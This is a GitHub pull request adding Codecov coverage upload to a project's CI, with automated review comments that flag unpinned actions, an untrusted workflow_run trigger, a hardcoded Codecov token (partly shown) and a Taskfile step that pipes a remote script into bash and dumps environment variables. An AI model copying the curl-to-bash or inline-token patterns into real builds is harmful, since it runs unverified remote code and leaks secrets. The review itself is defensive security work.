ci: onboard codecov#74
Conversation
WalkthroughAdds test coverage generation and directories to Taskfile, uploads the coverage report as a CI artifact, introduces a workflow that downloads that artifact and uploads it to Codecov, and adds a ChangesCode Coverage and Reporting
🎯 2 (Simple) | ⏱️ ~10 minutes Sequence Diagram(s)sequenceDiagram
participant Developer
participant GitHubActions_CI as CI
participant ArtifactStore
participant UploadWorkflow
participant Codecov
Developer->>CI: trigger `ci` (runs `task test` producing `build/_output/coverage/coverage.txt`)
CI->>ArtifactStore: upload artifact `coverage` (coverage.txt)
UploadWorkflow->>ArtifactStore: download artifact from triggering run id
UploadWorkflow->>Codecov: upload `coverage/coverage.txt` (uses secrets.CODECOV_TOKEN)
Codecov-->>UploadWorkflow: respond with upload result
Suggested Labels
🚥 Pre-merge checks | ✅ 5✅ Passed checks (5 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Comment |
There was a problem hiding this comment.
Actionable comments posted: 5
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/ci.yml:
- Line 33: Replace the floating tag for the GitHub Action by pinning
actions/upload-artifact@v7 to a specific full commit SHA: locate the workflow
step that currently references "uses: actions/upload-artifact@v7" and change it
to use the action at a full commit SHA (e.g.,
actions/upload-artifact@<full-commit-sha>); obtain the SHA from the
upload-artifact repository commit history or the action's release page and
update the workflow to use that exact SHA to hard-pin the dependency.
In @.github/workflows/upload-coverage.yml:
- Line 15: The workflow currently references mutable tags for actions
(actions/download-artifact@v8 and codecov/codecov-action@v6); replace these
tag-based pins with the corresponding immutable commit SHAs for those actions to
ensure supply-chain integrity: find the uses of "actions/download-artifact@v8"
and "codecov/codecov-action@v6" in the upload-coverage.yml and update each to
the full commit SHA (e.g., actions/download-artifact@<full-sha> and
codecov/codecov-action@<full-sha>) obtained from the respective action
repositories' commit history, then run a quick workflow lint or dry run to
validate the YAML.
- Around line 9-10: The workflow currently only checks
github.event.workflow_run.conclusion and may run on forked workflow_run events;
update the if condition to also require the run came from the same repository
(e.g., require github.event.workflow_run.head_repository.full_name ==
github.repository) so secrets like CODECOV_TOKEN are not exposed to
fork-triggered runs, and replace the action references
actions/download-artifact@v8 and codecov/codecov-action@v6 with their SHA-pinned
commits (use the specific commit SHAs for those two actions in the
upload-coverage.yml job step definitions) so the workflow uses exact action
revisions.
In `@taskfile.yaml`:
- Line 6: The file contains a hardcoded secret under the key CODECOV_TOKEN;
remove the literal value and change the usage to read the token from
environment/CI secrets instead (replace the hardcoded "d85bfa60-..." in the
taskfile.yaml entry for CODECOV_TOKEN with an environment variable reference and
ensure the CI pipeline sets CODECOV_TOKEN as a secret); update any docs or CI
config to define the secret in the pipeline/secret store and verify code that
reads CODECOV_TOKEN (e.g., the taskfile.yaml entry) will fall back or fail
clearly if the env var is missing.
- Around line 38-56: The task target that uploads Codecov
(upload-codecov-report) currently prints env (the "- env" step) and uses
curl|bash plus a hardcoded {{.CODECOV_TOKEN}}, which leaks secrets and is
unsafe; remove the "- env" dump, stop using bash <(curl ...) and instead source
CODECOV_TOKEN from environment/Task/CI secrets (do not inline the token), and
replace the curl-to-bash invocation with a safe, pinned uploader strategy
consistent with GitHub CI (e.g., call the official codecov uploader binary from
a verified package or invoke codecov/codecov-action@v6 equivalent in Task by
running the pinned action or the downloaded, checksummed CLI), updating the
upload block in upload-codecov-report to use {{.COV_DIR}}/coverage.txt and the
appropriate commit variable ({{.PR_COMMIT}} or {{.BASE_COMMIT}}) without echoing
env or exposing secrets.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: ddbe1f9e-a3e9-46a4-a7f9-786dce65253e
📒 Files selected for processing (5)
.codecov.yaml.github/workflows/ci.yml.github/workflows/upload-coverage.yml.gitignoretaskfile.yaml
📜 Review details
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (4)
- GitHub Check: Lint
- GitHub Check: Build Image
- GitHub Check: Test
- GitHub Check: govulncheck
🧰 Additional context used
📓 Path-based instructions (1)
**
⚙️ CodeRabbit configuration file
-Focus on major issues impacting performance, readability, maintainability and security. Avoid nitpicks and avoid verbosity.
Files:
taskfile.yaml
🪛 Betterleaks (1.3.1)
taskfile.yaml
[high] 6-6: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🪛 zizmor (1.25.2)
.github/workflows/upload-coverage.yml
[error] 2-5: use of fundamentally insecure workflow trigger (dangerous-triggers): workflow_run is almost always used insecurely
(dangerous-triggers)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
[error] 22-22: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
.github/workflows/ci.yml
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🔀 Multi-repo context codeready-toolchain/api, codeready-toolchain/toolchain-common, codeready-toolchain/host-operator, codeready-toolchain/toolchain-e2e
codeready-toolchain/api
- Codecov config present: .codecov.yaml [::codeready-toolchain/api::.codecov.yaml]
- Make targets and coverage paths:
- OUT_DIR ./build/_output defined in make/out.mk [::codeready-toolchain/api::make/out.mk:4]
- COV_DIR =
$(OUT_DIR)/coverage and go test writes $ (COV_DIR)/coverage.txt in make/test.mk [::codeready-toolchain/api::make/test.mk:21,27-29] - upload-codecov-report target calls bash <(curl -s https://codecov.io/bash) -f $(COV_DIR)/coverage.txt [::codeready-toolchain/api::make/test.mk:31-45]
- .gitignore ignores build/_output and coverage.txt [::codeready-toolchain/api::.gitignore:17,?]
- A YAML lint include references /.codecov.yaml [::codeready-toolchain/api::.yamllint:3]
codeready-toolchain/toolchain-common
- Coverage integration already present:
- OUT_DIR ./out and COV_DIR = $(OUT_DIR)/coverage defined in make/out.mk / make/test.mk [::codeready-toolchain/toolchain-common::make/out.mk:4,::codeready-toolchain/toolchain-common::make/test.mk:13,19]
- test-ci/test-with-coverage flow and upload-codecov-report that posts $(COV_DIR)/coverage.txt [::codeready-toolchain/toolchain-common::make/test.mk:8-13,21-36]
- GH Actions upload workflow exists: .github/workflows/upload-coverage.yml uses codecov/codecov-action@v6 and files: coverage/coverage.txt [::codeready-toolchain/toolchain-common::.github/workflows/upload-coverage.yml:1,22,27]
- sonar config expects out/coverage/coverage.txt [::codeready-toolchain/toolchain-common::sonar-project.properties:19]
- README badge referencing Codecov [::codeready-toolchain/toolchain-common::README.adoc:5]
- codecov.yaml present (repo-specific config) [::codeready-toolchain/toolchain-common::codecov.yaml:1]
codeready-toolchain/host-operator
- Coverage integration and upload target:
- OUT_DIR ./build/_output and COV_DIR =
$(OUT_DIR)/coverage; go test writes $ (COV_DIR)/coverage.txt [::codeready-toolchain/host-operator::make/out.mk:4,::codeready-toolchain/host-operator::make/test.mk:21,27-29] - upload-codecov-report target uses codecov bash uploader -f $(COV_DIR)/coverage.txt [::codeready-toolchain/host-operator::make/test.mk:31-45]
- OUT_DIR ./build/_output and COV_DIR =
- GH Actions upload workflow exists: .github/workflows/upload-coverage.yml uses codecov action and files: coverage/coverage.txt [::codeready-toolchain/host-operator::.github/workflows/upload-coverage.yml:1,22,27]
- .codecov.yaml present [::codeready-toolchain/host-operator::.codecov.yaml:1]
- .gitignore contains build/_output and coverage.txt [::codeready-toolchain/host-operator::.gitignore:2,6]
- README badge referencing Codecov [::codeready-toolchain/host-operator::README.adoc:5]
codeready-toolchain/toolchain-e2e
- Repository uses build/_output OUT_DIR layout and ignores build/_output and coverage.txt in .gitignore [::codeready-toolchain/toolchain-e2e::make/out.mk:4,::codeready-toolchain/toolchain-e2e::.gitignore:2,7]
- No explicit make/test.mk coverage upload targets or .codecov.yaml discovered in search results for this repo (only out.mk and various make files referencing OUT_DIR) [::codeready-toolchain/toolchain-e2e::make/out.mk:1]
Summary / impact
- The PR adds CI steps and workflow files in argocd-mcp-server to upload coverage; the codeready-toolchain repos already have similar coverage conventions (OUT_DIR/COV_DIR -> coverage/coverage.txt), make targets (upload-codecov-report), and existing repo-level Codecov configs and upload workflows. Paths and artifact names (coverage/coverage.txt or build/_output/out/coverage/coverage.txt) are consistent and used across repos, so Codecov onboarding here follows established patterns and is unlikely to introduce API/contract breakage between repos.
| task test | ||
|
|
||
| - name: Upload coverage artifact | ||
| uses: actions/upload-artifact@v7 |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
# Show the relevant section around the referenced line
nl -ba .github/workflows/ci.yml | sed -n '20,60p'
# Find all usages of upload-artifact in the repo
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || true
# Also find any pinned-to-SHA patterns for upload-artifact (heuristic: 40+ hex chars)
rg -n "uses:\s*actions/upload-artifact@[0-9a-f]{7,40}" .github/workflows || true
# Print any other upload-artifact usage with other tags
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || trueRepository: codeready-toolchain/argocd-mcp-server
Length of output: 124
🏁 Script executed:
#!/bin/bash
set -euo pipefail
echo "=== ci.yml excerpt (lines 20-60) ==="
python3 - <<'PY'
path = ".github/workflows/ci.yml"
with open(path, "r", encoding="utf-8") as f:
lines = f.readlines()
for i in range(19, min(60, len(lines))):
print(f"{i+1:4d}: {lines[i].rstrip()}")
PY
echo
echo "=== All upload-artifact usages ==="
rg -n "uses:\s*actions/upload-artifact@" .github/workflows || true
echo
echo "=== upload-artifact usages pinned to long hex (heuristic) ==="
rg -n "uses:\s*actions/upload-artifact@[0-9a-f]{7,40}" .github/workflows || trueRepository: codeready-toolchain/argocd-mcp-server
Length of output: 1453
Pin actions/upload-artifact to a full commit SHA.
The workflow uses actions/upload-artifact@v7, and the movable tag weakens supply-chain guarantees.
Suggested fix pattern
- uses: actions/upload-artifact@v7
+ uses: actions/upload-artifact@<full-length-commit-sha>🧰 Tools
🪛 zizmor (1.25.2)
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/ci.yml at line 33, Replace the floating tag for the GitHub
Action by pinning actions/upload-artifact@v7 to a specific full commit SHA:
locate the workflow step that currently references "uses:
actions/upload-artifact@v7" and change it to use the action at a full commit SHA
(e.g., actions/upload-artifact@<full-commit-sha>); obtain the SHA from the
upload-artifact repository commit history or the action's release page and
update the workflow to use that exact SHA to hard-pin the dependency.
| if: > | ||
| github.event.workflow_run.conclusion == 'success' |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File =="
ls -l "$FILE"
echo
echo "== Lines 1-120 =="
nl -ba "$FILE" | sed -n '1,140p'Repository: codeready-toolchain/argocd-mcp-server
Length of output: 258
🏁 Script executed:
#!/bin/bash
set -euo pipefail
rg -n "CODECOV_TOKEN|workflow_run|codecov-action|download-artifact" .github/workflows -S
echo
echo "== List workflow files =="
ls -1 .github/workflowsRepository: codeready-toolchain/argocd-mcp-server
Length of output: 700
Add a trusted-repo guard (and SHA-pin actions) in workflow_run coverage uploader.
codeready-toolchain/argocd-mcp-server/.github/workflows/upload-coverage.yml runs on workflow_run, gates only on github.event.workflow_run.conclusion == 'success', then uploads using secrets.CODECOV_TOKEN. Add a trust guard (e.g., require github.event.workflow_run.head_repository.full_name == github.repository) so fork-originated runs can’t trigger secret-bearing uploads. Also SHA-pin actions/download-artifact@v8 and codecov/codecov-action@v6 rather than using only major-version tags.
Suggested guard
- if: >
- github.event.workflow_run.conclusion == 'success'
+ if: >
+ github.event.workflow_run.conclusion == 'success' &&
+ github.event.workflow_run.head_repository.full_name == github.repository📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| if: > | |
| github.event.workflow_run.conclusion == 'success' | |
| if: > | |
| github.event.workflow_run.conclusion == 'success' && | |
| github.event.workflow_run.head_repository.full_name == github.repository |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml around lines 9 - 10, The workflow
currently only checks github.event.workflow_run.conclusion and may run on forked
workflow_run events; update the if condition to also require the run came from
the same repository (e.g., require
github.event.workflow_run.head_repository.full_name == github.repository) so
secrets like CODECOV_TOKEN are not exposed to fork-triggered runs, and replace
the action references actions/download-artifact@v8 and codecov/codecov-action@v6
with their SHA-pinned commits (use the specific commit SHAs for those two
actions in the upload-coverage.yml job step definitions) so the workflow uses
exact action revisions.
|
|
||
| steps: | ||
| - name: Download coverage artifact | ||
| uses: actions/download-artifact@v8 |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File: $FILE =="
nl -ba "$FILE" | sed -n '1,120p'
echo
echo "== All action uses in $FILE =="
rg -n "^\s*uses:" "$FILE" || trueRepository: codeready-toolchain/argocd-mcp-server
Length of output: 192
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== File: $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,140p'
echo
echo "== All action uses in $FILE =="
rg -n "^\s*uses:" "$FILE" || trueRepository: codeready-toolchain/argocd-mcp-server
Length of output: 1420
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,140p'
echo
rg -n "^\s*uses:" "$FILE" || trueRepository: codeready-toolchain/toolchain-common
Length of output: 1362
🏁 Script executed:
#!/bin/bash
set -euo pipefail
FILE=".github/workflows/upload-coverage.yml"
echo "== $FILE =="
awk '{printf "%5d\t%s\n", NR, $0}' "$FILE" | sed -n '1,160p'
echo
rg -n "^\s*uses:" "$FILE" || trueRepository: codeready-toolchain/host-operator
Length of output: 1363
Pin GitHub Actions to commit SHAs (supply-chain integrity)
In .github/workflows/upload-coverage.yml, both action references are tag-based (actions/download-artifact@v8 at 15, codecov/codecov-action@v6 at 22) and should be replaced with immutable full commit SHAs.
Suggested fix pattern
- uses: actions/download-artifact@v8
+ uses: actions/download-artifact@<full-length-commit-sha>
...
- uses: codecov/codecov-action@v6
+ uses: codecov/codecov-action@<full-length-commit-sha>🧰 Tools
🪛 zizmor (1.25.2)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/upload-coverage.yml at line 15, The workflow currently
references mutable tags for actions (actions/download-artifact@v8 and
codecov/codecov-action@v6); replace these tag-based pins with the corresponding
immutable commit SHAs for those actions to ensure supply-chain integrity: find
the uses of "actions/download-artifact@v8" and "codecov/codecov-action@v6" in
the upload-coverage.yml and update each to the full commit SHA (e.g.,
actions/download-artifact@<full-sha> and codecov/codecov-action@<full-sha>)
obtained from the respective action repositories' commit history, then run a
quick workflow lint or dry run to validate the YAML.
There was a problem hiding this comment.
♻️ Duplicate comments (3)
.github/workflows/ci.yml (1)
33-33:⚠️ Potential issue | 🟠 Major | ⚡ Quick winPin
actions/upload-artifactto an immutable commit SHA.Line 33 uses a floating major tag (
@v7), which weakens supply-chain guarantees for CI.Suggested fix
- uses: actions/upload-artifact@v7 + uses: actions/upload-artifact@<full-length-commit-sha>🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In @.github/workflows/ci.yml at line 33, Replace the floating major tag for the upload artifact action with an immutable commit SHA to harden CI supply-chain; locate the workflow step that uses "actions/upload-artifact@v7" and change it to the corresponding pinned commit reference (e.g., "actions/upload-artifact@<commit-sha>") and include a short comment with the upstream release or date if helpful, then run the workflow locally or in a test branch to verify the action still behaves as expected..github/workflows/upload-coverage.yml (2)
15-15:⚠️ Potential issue | 🟠 Major | ⚡ Quick winPin both action references to full commit SHAs.
Lines 15 and 22 use mutable tags; replace both with immutable SHAs.
Suggested fix
- uses: actions/download-artifact@v8 + uses: actions/download-artifact@<full-length-commit-sha> ... - uses: codecov/codecov-action@v6 + uses: codecov/codecov-action@<full-length-commit-sha>Also applies to: 22-22
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In @.github/workflows/upload-coverage.yml at line 15, Replace the mutable action tags with immutable commit SHAs: locate the uses of actions/download-artifact (currently "actions/download-artifact@v8") and actions/upload-artifact (the other mutable tag around line 22) in the workflow and replace their tag suffixes with the corresponding full commit SHA for each action's repository (e.g., "actions/download-artifact@<full-commit-sha>" and "actions/upload-artifact@<full-commit-sha>") so the workflow pins to immutable references; ensure you fetch the correct commit SHAs from the official action repos and update both occurrences.
9-10:⚠️ Potential issue | 🟠 Major | ⚡ Quick winAdd a trusted-repo guard before using
CODECOV_TOKEN.Line 10 checks only for successful completion; add a same-repository condition so this secret-bearing job does not run for untrusted
workflow_runsources.Suggested fix
- if: > - github.event.workflow_run.conclusion == 'success' + if: > + github.event.workflow_run.conclusion == 'success' && + github.event.workflow_run.head_repository.full_name == github.repository🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In @.github/workflows/upload-coverage.yml around lines 9 - 10, The job currently only checks github.event.workflow_run.conclusion == 'success' before using the secret CODECOV_TOKEN; update the job's if condition to also require the workflow_run originate from the same repository (e.g., add a check against github.event.workflow_run.repository.full_name == github.repository or github.event.workflow_run.head_repository.full_name == github.repository) so the secret is only used for trusted, same-repo workflow runs; modify the existing if expression to combine the success check and this same-repo guard.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Duplicate comments:
In @.github/workflows/ci.yml:
- Line 33: Replace the floating major tag for the upload artifact action with an
immutable commit SHA to harden CI supply-chain; locate the workflow step that
uses "actions/upload-artifact@v7" and change it to the corresponding pinned
commit reference (e.g., "actions/upload-artifact@<commit-sha>") and include a
short comment with the upstream release or date if helpful, then run the
workflow locally or in a test branch to verify the action still behaves as
expected.
In @.github/workflows/upload-coverage.yml:
- Line 15: Replace the mutable action tags with immutable commit SHAs: locate
the uses of actions/download-artifact (currently "actions/download-artifact@v8")
and actions/upload-artifact (the other mutable tag around line 22) in the
workflow and replace their tag suffixes with the corresponding full commit SHA
for each action's repository (e.g.,
"actions/download-artifact@<full-commit-sha>" and
"actions/upload-artifact@<full-commit-sha>") so the workflow pins to immutable
references; ensure you fetch the correct commit SHAs from the official action
repos and update both occurrences.
- Around line 9-10: The job currently only checks
github.event.workflow_run.conclusion == 'success' before using the secret
CODECOV_TOKEN; update the job's if condition to also require the workflow_run
originate from the same repository (e.g., add a check against
github.event.workflow_run.repository.full_name == github.repository or
github.event.workflow_run.head_repository.full_name == github.repository) so the
secret is only used for trusted, same-repo workflow runs; modify the existing if
expression to combine the success check and this same-repo guard.
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: c91ec208-e156-4075-ad51-5dbbc91dcccb
📒 Files selected for processing (5)
.codecov.yaml.github/workflows/ci.yml.github/workflows/upload-coverage.yml.gitignoretaskfile.yaml
✅ Files skipped from review due to trivial changes (2)
- .gitignore
- .codecov.yaml
🚧 Files skipped from review as they are similar to previous changes (1)
- taskfile.yaml
📜 Review details
🧰 Additional context used
🪛 zizmor (1.25.2)
.github/workflows/ci.yml
[error] 33-33: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
.github/workflows/upload-coverage.yml
[error] 2-5: use of fundamentally insecure workflow trigger (dangerous-triggers): workflow_run is almost always used insecurely
(dangerous-triggers)
[error] 15-15: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
[error] 22-22: unpinned action reference (unpinned-uses): action is not pinned to a hash (required by blanket policy)
(unpinned-uses)
🔀 Multi-repo context codeready-toolchain/api, codeready-toolchain/toolchain-common, codeready-toolchain/host-operator, codeready-toolchain/toolchain-e2e
Linked repositories findings
codeready-toolchain/api
- Has an upload-codecov make target and uses the Codecov bash uploader: make/test.mk (lines with .PHONY: upload-codecov-report and bash <(curl -s https://codecov.io/bash)) [::codeready-toolchain/api::make/test.mk]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/api::make/test.mk]
codeready-toolchain/toolchain-common
- Sonar expects coverage at out/coverage/coverage.txt: sonar-project.properties:19 [::codeready-toolchain/toolchain-common::sonar-project.properties]
- Has test CI flow and upload-codecov-report target in make/test.mk (.PHONY: upload-codecov-report; test-ci: test-with-coverage upload-codecov-report) [::codeready-toolchain/toolchain-common::make/test.mk]
- Has a codecov.yaml and README badge referencing Codecov [::codeready-toolchain/toolchain-common::codecov.yaml][::codeready-toolchain/toolchain-common::README.adoc]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/toolchain-common::make/test.mk]
codeready-toolchain/host-operator
- Has upload-codecov-report target using the Codecov bash uploader in make/test.mk (.PHONY: upload-codecov-report and bash <(curl -s https://codecov.io/bash)) [::codeready-toolchain/host-operator::make/test.mk]
- README includes Codecov badge [::codeready-toolchain/host-operator::README.adoc]
- A CODECOV_TOKEN literal appears in make/test.mk (token value present in search output) [::codeready-toolchain/host-operator::make/test.mk]
codeready-toolchain/toolchain-e2e
- No matches for coverage/codecov found in the search output (no make/test.mk or codecov config detected) — may lack repo-level Codecov CI plumbing [::codeready-toolchain/toolchain-e2e::]
Summary: The argocd-mcp-server PR's Codecov onboarding aligns with patterns already present in api, toolchain-common, and host-operator (coverage paths, make upload targets, workflows). toolchain-e2e appears not to have similar Codecov config in the searched locations.
Description
Onboard CodeCov (action item from the Agentic Readiness discussion)
Summary by CodeRabbit